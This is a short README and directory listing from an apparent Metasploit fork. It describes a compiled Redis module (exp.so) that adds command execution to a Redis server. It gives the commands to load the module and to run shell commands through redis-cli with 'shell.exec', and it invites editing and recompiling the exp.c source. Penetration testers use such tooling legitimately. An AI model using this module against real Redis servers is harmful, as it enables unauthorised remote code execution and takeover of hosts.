Files
metasploit-gs/data/exploits/redis/exp
2019-07-20 00:17:57 +08:00
..
2019-07-20 00:17:57 +08:00
2019-07-20 00:17:57 +08:00
2019-07-20 00:17:57 +08:00
2019-07-20 00:17:57 +08:00

Intro

This is a compiled shared object file of redis module.

Load redis extension

MODULE load ./exp.so

Run command

redis-cli
127.0.0.1:6379> shell.exec "whoami"

Compile

You can modify the exp.c source code if you want. And the compile it to exp.so in current directory.

make